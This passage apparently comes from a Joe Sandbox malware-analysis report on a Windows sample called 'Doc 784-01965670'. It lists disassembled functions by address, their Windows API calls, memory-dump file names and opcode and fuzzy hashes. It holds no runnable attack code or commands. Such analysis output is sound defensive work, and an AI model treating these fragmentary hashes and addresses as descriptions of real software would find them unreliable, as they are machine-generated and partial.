                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547909840-0
                                                                                                                                    • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                    • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                                                    • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                    • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                                    Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                                    • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2354583917-0
                                                                                                                                    • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                    • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                                    • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                    • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                                    Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                    • GetMenu.USER32 ref: 004776AA
                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                                    • _wcslen.LIBCMT ref: 0047771A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1823500076-0
                                                                                                                                    • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                    • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                                                    • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                    • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                                                    Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 896007046-0
                                                                                                                                    • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                                    • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                                                    • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                                    • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                                                    Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                    • SendMessageW.USER32(02FA1BE8,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                    • SendMessageW.USER32(02FA1BE8,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                    • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                    • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                                    • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                    • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                                    Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 004484C4
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                                    • IsMenu.USER32(?), ref: 0044857B
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                                    • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 3866635326-4108050209
                                                                                                                                    • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                    • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                                    • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                    • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                                                    Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                                    • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                    • String ID: 0vH
                                                                                                                                    • API String ID: 327565842-3662162768
                                                                                                                                    • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                                    • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                                    • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                                    • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                                    Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                                                    • GetFocus.USER32 ref: 00448B1C
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                    • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3429747543-0
                                                                                                                                    • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                    • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                                    • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                    • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                                    Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                                    • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                    • String ID: %lu$HH
                                                                                                                                    • API String ID: 3164766367-3924996404
                                                                                                                                    • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                    • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                                                                    • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                                                                    • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                                                                    Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                    • API String ID: 3850602802-3636473452
                                                                                                                                    • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                                    • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                                                                    • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                                                                    • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                                                                    Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                                                                    • __calloc_crt.LIBCMT ref: 00415743
                                                                                                                                    • __getptd.LIBCMT ref: 00415750
                                                                                                                                    • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                                                                    • __dosmaperr.LIBCMT ref: 004157A9
                                                                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269668773-0
                                                                                                                                    • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                    • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                                                                    • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                                                                    • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                                                                    Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                                                                      • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                    • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                    • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                                                                    • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                                                                    • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                                                                    Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                    • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                    • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
